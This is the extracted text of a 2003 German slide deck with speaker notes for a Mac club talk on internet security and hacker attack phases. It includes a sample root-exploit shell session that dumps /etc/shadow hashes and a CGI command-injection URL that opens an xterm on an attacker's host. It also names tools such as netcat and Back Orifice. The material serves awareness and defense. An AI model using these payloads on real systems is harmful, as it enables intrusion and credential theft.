Klaus-Peter Hahn Mac Club Aschaffenburg Termin: 9. Januar 2003 25.03.2017 Internet & Sicherheit Klaus-Peter Hahn Mac Club Aschaffenburg Termin: 9. Januar 2003 Wer weiß, - ob oder ob nicht - ob er bei der Nutzung des Internet schon einmal Ziel eines Angriffes war?

Einführung Daten / Datenpakete Datenübertragung 25.03.2017 Einführung Daten / Datenpakete Datenübertragung Paketorientierte Datenübertragung Serielle Datenströme (synchron) IP-Adressen URL - Unified Resource Locator Kenntnisse über Bit und Byte abfragen - sind wichtig für das weitere Verständnis.

Protokolle IP - Internet Protocol TCP - Transport Control Protocol UDP - User Datagram Protocol Sequenznummer

Ports IP-Ports (Übertragungskanäle)  Etherpeek-Bilder Port 23 - Telnet-Port (Kommandozeile) Telnet auf einen anderen Port z.B. Port 25 Kommunikation mit Kommandos Puffer-Überläufe (überlange Eingaben)

Services (packetorientiert) HTTP - HyperText Transport Protocol FTP - File Transport Protocol SMTP - Simple Mail Transport Protocol POP3 - Post Office Protocol (Version 3) IMAP - Internet Message Access Protocol

Hackerangriffe durch Hackertools Portscans Auswertung von Banner-Informationen Bekannte Verwundbarkeiten „Trojanische Pferde“

Gefahrenquellen: Gefährlicher und einfacher denn je 25.03.2017 Gefahrenquellen: Gefährlicher und einfacher denn je Packet Forging/ Spoofing Hoch Stealth Diagnostics Nötiges technisches Wissen DDOS Back Doors Sweepers Ausgefeiltheit der Angriffe Exploiting Known Vulnerabilities Sniffers Hijacking Sessions Disabling Audits Self Replicating Code Password Cracking When most people read about Internet hacking incidents, they get the impression that these are highly complex, technical attacks that takes a genius to create. Reality is that the really smart people first come up with these highly complex, technical attacks, but they share the information and the tools required to pull off the attack on the Internet. The “open sharing” of hacking information and tools allows individuals with minimal technical knowledge to duplicate the attack. Often, it is as easy as downloading the attack tool from the Internet and launching it against targets. You don’t need to know anything other than how to run the attack tool. The bottom line is that it doesn’t take a genius to successfully attack systems and networks, it just takes someone downloading attack tools. Password Guessing Niedrig 1980 1990 2000

Verfügbarkeit von Tools 25.03.2017 Verfügbarkeit von Tools Connected to www.test.com www.test.com Anyone can be or become a hacker (www.happyhacker.org). “Script Kiddies” for wannabe crackers can be found as near as your customer’s corner electronics store-There are many free GUI tools For example: l0PHT-Crack (www.l0pht.com) Back Orifice 2000 (www.cultdeadcow.com) Trojanized utilities: eliminate log files, hide directories, collect information rootkit.com: showing the vulnerabilities of an OS vs giving potential hacker tools Root kits - Allows a compromised machine to have custom versions of utilities and back-doors into areas of the OS. Basic system administration can not detect the changes after a root kit is installed (files have same date / time / size etc ) This creates an environment for the attacker to operate without being detected. Root Kits are primarily UNIX based though NT kits exists. Some Root Kits offer special features: sniffing tuned to find passwords log modifications to remove presence

Attacks on The Increase 25.03.2017 Attacks on The Increase “The CERT Coordination Center's tally should top 46,000 [attacks] by the end of the year, doubling the nearly 22,000 incidents counted last year.” Code Red and Nimda were each only counted once in this report “The CERT Coordination Center's policy is to count each worm or virus only once, no matter how widespread the attacks become.” Source: c/net: news.com, 15 October 2001 http://news.cnet.com/news/0-1003-200- 7532673.html?tag=mn_hd The trends for vulnerabilities is on the rise. CERT is an organization which tracks and records security vulnerabilities. Based on current trends, the CERT Coordination Center's security incident tally should top 46,000 [attacks] by the end of the year, doubling the nearly 22,000 incidents counted last year. Each ‘incident’ corresponds to a report filed by a company or organization struck by an intruder, worm, virus, or other Internet attack. Widely publicized attacks, such as this year’s Code Red and Nimda incidents, each only count as a single incident

Sicherheitsverständnis Gestern … 25.03.2017 Sicherheitsverständnis Gestern … Sicherheit = Firewall … ist nicht genug !!! Internet Die Anforderungen an Sicherheit haben sich nicht grundsätzlich verändert. Sicherheit war und ist noch nie lediglich durch eine Firewall zu erreichen gewesen! Marketing der Pin-Point Produkt Anbieter haben dieses falsche Bild suggeriert. [klick] Sicherheit ist wesentlich mehr als nur ein einzelnes Produkt, sogar mehr als eine Produktpalette. Sicherheit ist ein Prozeß und setzt sich aus vielen Einzelkomponenten zusammen, die erst durch Zusammenspiel die gewünschte Wirkung erzielen.

Sie sind Sicher! – Wirklich ??? 25.03.2017 Sie sind Sicher! – Wirklich ??? Firewall Das Thema Sicherheit ist sehr komplex und wird häufig in seiner Komplexität unterbewertet. Anschaulich wird dies am Beispiel Fahrrad, wo offensichtlich alles für die Sicherung des Fahrrads gegen Diebstahl getan wurde. Frage: Fühlen Sie sich ausreichend gesichtert? Analog zum Fahrradbeispiel sollten Sie Ihre Netzwerksicherheit analysieren. … Firewalls Netzkomponenten (Server, Hosts, Router, Switche) Dial-up Zugaenge Modems Passwoerter Logging ….

Gefahren in Datennetzen 25.03.2017 Gefahren in Datennetzen telnet foo.bar.org username: dan password: I’m Bob, Send Me all Corporate Correspondence with Cisco m-y-p-a-s-s-w-o-r-d d-a-n Bob Verlust der Vertraulichkeit Vortäuschen der Identität 4 Beispiele; kein Anspruch auf Vollstaendigkeit Vertraulichkeitsverlust: Bsp.: Telnet uebertragt Passwoerter im Klartext, die mitgesniffert werden koennen. Alternativ: SSL, IPSEC Identitaetsvortaeuschung: Vorgeben jemand zu sein, der man nicht ist. Damit kommt man an Informationen die nicht zugaenglich sein sollten. Bsp. Faelschen einer E-Mail Adresse oder IP Spoofing. DoS: Angriffe gegen die Verfuegbarkeit durch das Ueberlasten von Netzkomponenten. Integritaet: “Man in the middle attacks”. Jemand gibt sich in beide Richtungen einer Kommunikation als der jeweilige andere Kommunikationspartner aus. Bsp.: faelschen von Daten – aus $100 werden $1000. Loesungen – Sicherer Transport, IPSEC. Deposit $1000 Deposit $100 CPU Customer Bank “Denial of Service” Verlust der Integrität

Vorgehen des Hackers Netzwerkangriff Phase 1: Netzwerk erkunden 25.03.2017 Vorgehen des Hackers Phase 1: Netzwerk erkunden Phase 2: Ein System kontrollieren Phase 3: Vertrauen nutzen Phase 4: Daten stehlen Phase 5: Das Netz kontrollieren Netzwerkangriff Building Module Mainframe Module WAN Module Internet SMTP DNS HTTP/SSL Server Module Linker/oberer Teil des Bildes zeigt relativ komplexes Netz mit Servern, Campus, Mainframes und WAN Anbindung. Unterer rechter Teil zeigt Internet Connectivity mit Servern und redundanten Firewalls. Dies ist der potentielle Angriffspunkt fuer von aussen kommende Hacker. 1. Netzerkundung. Informationen sammeln ueber Netzwerke, IP-Addressranges, Servernamen … 2. Own the root CGI-BIN and buffer overflow 3. Port redirection 4. Own the data 5.

Netzwerkerkundung IP-Adressen erkunden Ports scannen 25.03.2017 Netzwerkerkundung IP-Adressen erkunden Ports scannen Andere Hilfsmittel Whois DNS Web pages Scorecard: Network Security Hacker 0 0 Ziel des Angreifers So viel wie moeglich ueber das Angriffsziel in Erfahrung bringen. Schritt fuer Schritt Vorgehensweise: Ping Sweep. Alle IP Adressen eines Netzes abpingen um rauszukriegen wo Maschinen antworten. Port Scan (I.e. nmap). Die antwortenden IP Adressen per Portscanner abscannen um rauszukriegen welche Ports wo offen sind. Others: Whois, DNS, Web Pages Angriff Resultate Hervorbringen von Addressbereichen, Hosts, and services auf den Hosts Known Servers: (jeder von diesen hat viele Vulnerabilities) SMTP(send mail) DNS (many) HTTP/SSL (OS) Firewall wird eventuell erkannt oder auch nicht SMTP DNS HTTP/SSL Internet Angreifer

Ein System kontrollieren 25.03.2017 Ein System kontrollieren Vulnerability Scan bash-2.02$ id uid=11117(networkers) gid=1(other) bash-2.02$ cat /etc/shadow cat: cannot open /etc/shadow bash-2.02$ ls -l total 48 -rwxr-xr-x 1 networkersother 24563 Nov 10 13:58 ex_lib bash-2.02$ ./ex_lib jumping address : efffe7b8 # id uid=11117(networkers) gid=1(other) euid=0(root) egid=3(sys) # cat /etc/shadow root:07AUBkfmBv7O2:11043:::::: toor:r1CjeWYEWNMDk:10955:::::: daemon:NP:6445:::::: CGI-BIN Vulnerability Starten von xterm Buffer Overflow Vulnerability Get “root” Scorecard: Network Security Hacker 0 0 0 1 Ergebnis: Kontrolle über einen Host Angriffsziel: Einen Host kompromittieren um von dort weitere Angriffe zu starten. Tools wie SATAN koennen verwendet werden um nach bekannten Loechern auf einem System zu suchen. Einzelschritte: Meistens ist der Web Server lohnendes Ziel (Port 80 offen) Vulnerability Scan (automatisch oder manuell) [eventuell auch ueber mehrere Monate] Erfolgreich z.B. (cdomain 1.0) Angriffssequenz per Web Browser schicken http//www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20hacker.machine.com:0 Xterm terminal wird auf der Maschine des Angreifers angezeigt und erlaubt interaktiven Zugriff Betriebssystemversion ist leicht zu erkennen. Hacker FTP’s Buffer overflow von seiner Maschine (libc) Buffer Overflow wird ausgefuehrt und Root Zugriff erreicht. Root Kit can dann installiert werden um Anwesenheit zu verstecken und weitere Angriffe auszufuehren. Angriffs Resultat: Angreifer hat nun volle Kontrolle ueber das System und kann die oeffentliche Web-Darstellung manipulieren (leicht) oder weiterhacken um interessantere Informationen zu finden. SMTP DNS Internet Angreifer OWNED: HTTP/SSL HTTP/SSL

Vertrauensbeziehungen ausnutzen 25.03.2017 Vertrauensbeziehungen ausnutzen Weitere Erkundung Log Files analysieren Prozesse Konfigurationsdateien Password Cracking Sniffing Scorecard: Network Security Hacker 0 1 Back-End Datenbank gefunden Angriffsziell: Herausfinden wer dem gehackten System vertraut (Vertrauensbeziehung). Einzelschritte Weitere Erkundung: log files (syslog, lastlog, rhosts, shell history, etc.) running processes config files password cracking sniffing Angriffsresultate: Der Angreifer kennt jetzt die userids und passwoerter der Maschine und sieht das sie per SQL und SSH mit einem back-end Datenbanksystem kommuniziert. SMTP Back-End Database DNS Internet Angreifer OWNED: HTTP/SSL

Diebstahl von Informationen 25.03.2017 Diebstahl von Informationen Einsatz von Port Redirection Angriff ausführen Root durch “cracked” Passwörter Scorecard: Network Security Hacker 0 1 Source: Web Server Destination: Back-End Database Port: 22 (SSH) Source: Angreifer Destination: Back-End Database Port: 22 (SSH) 0 2 OWNED: Back-End Database Angriffsziel: Angreifer moechte direkten Zugang zum Datenbankserver, aber SSH wird am Zugangsrouter geblockt. Uebergeordnetes Ziel: Eine interaktive Session mit dem DB Server von aussen. Einzelschritte: Installation eines Port redirection utility (I.e. netcat) um Verkehr der auf dem Webserver auf Port 25 ankommt auf den SSH Port 22 des DB Servers umzuleiten. SSH von der Station des Angreifers auf Port 25 zum Webserver hin starten.. Web server re-directed den Verkehr zur Backend Datenbank auf Port 22. Angriffsresultate: Interaktive session zum backend DB server vom Angreifer aus. Root access ueber die gecrackten Passworte des web servers. Kreditkartennummern aus der Datenbank… Besitz ergreifen vom DB Server SMTP Back-End Database DNS Internet Source: Angreifer Destination: Web Server Port: 25 (SMTP) Angreifer OWNED: HTTP/SSL

Das gesamte Netz erkunden 25.03.2017 Das gesamte Netz erkunden Angreifer ist “hinter” der Firewall Keine Sicherheitsvor-kehrungen mehr Weitere Erkundung Vulnerability Scan … Scorecard: Network Security Hacker 0 2 Angriffsziel: Uebernahme ALLER verletzbaren Systeme im Unternehmen. Einzelschritte Jetzt ist es leicht: Keine Firewalls mehr, keine Encryption, keine ACLs usw. Informationen sammeln Ping Sweeps Port Scans Sniffing Vulnerability Scans Ausnutzen der verschiedenen Loecher in den Systemen, Trojanische E-Mails usw. Ausgehend von Daten der Cisco Security Consulting Group koennen 75% aller Netze uebernommen werden… OWNED: Back-End Database SMTP Back-End Database DNS Internet Angreifer OWNED: HTTP/SSL

Das gesamte Netz kontrollieren 25.03.2017 Das gesamte Netz kontrollieren Angreifer ist “hinter” der Firewall Keine Sicherheitsvor-kehrungen mehr Weitere Erkundung Vulnerability Scan Angreifer hat einen neuen Spielplatz Scorecard: Network Security Hacker 0 752 Nochmal!! Firewall ist nicht gleich Security wie dieses Beispiel zeigt. Hier wird zugelassene Kommunikation zwischen Webserver und DB server genutzt, was die Firewall erlaubt. Die Aussage eine Firewall von Hersteller xy loest alle Security Probleme ist falsch. Security sollte nicht nur auf dem einen Bein “Firewall” stehen Mehrstufige Sicherheitskonzepte sind gefragt. Cisco bietet Moeglichkeiten auf allen Komponenten. Wen es um LAN Switching geht, ist Layer3 aus Securitysicht besonders wichtig !! In flachen L2 Netzen ist nur wenig Kontrolle moeglich, Security basiert weitestgehend auf L3, da kann man eingreifen. OWNED: Back-End Database SMTP DNS Internet Angreifer OWNED: HTTP/SSL

Schutz durch Prevention Packetfilter (Services) Firewall (Packetfilter auf Applikationsebene) MAD - Malicious Activity Detection IDS - Intrusion Detection System Wie lange online, mit welcher Bandbreite?

Was kann ich tun? Passwörter immer wieder ändern Email abrufen per SSL Antivirus Software installieren (Trojaner) Personal Firewall / Paketfilter installieren Gesundes Mißtrauen gegenüber dem Internet Evtl. separater Computer für Internetnutzung

Was sollte ich tun? Gesundes Mißtrauen Anti-Virus Programm 25.03.2017 Was sollte ich tun? Gesundes Mißtrauen Anti-Virus Programm Personal Firewall 2. Email-Adresse für Internet Verschlüsselung Digitale Unterschrift Zertifikate gesundes Mißtrauen Anti-Virus Programm Personal Firewall 2. Email-Adresse für Internet Verschlüsselung digitale Unterschrift Zertifikate

Software für den Macintosh Norton Personal Firewall IPNetSentry (Paketfilter) NetBarrier (Personal Firewall) Virex / Norton Antivirus Verschlüsselungs-Software PGP Virtual Private Network

Internet-Seiten http://www.securemac.com http://www.macanalysis.com Allg. Infos zur Sicherheit: http://www.securemac.com Tool zum Test: http://www.macanalysis.com Infos über Verwundbarkeiten: http://www.astalavista.com klaus.hahn@telda.net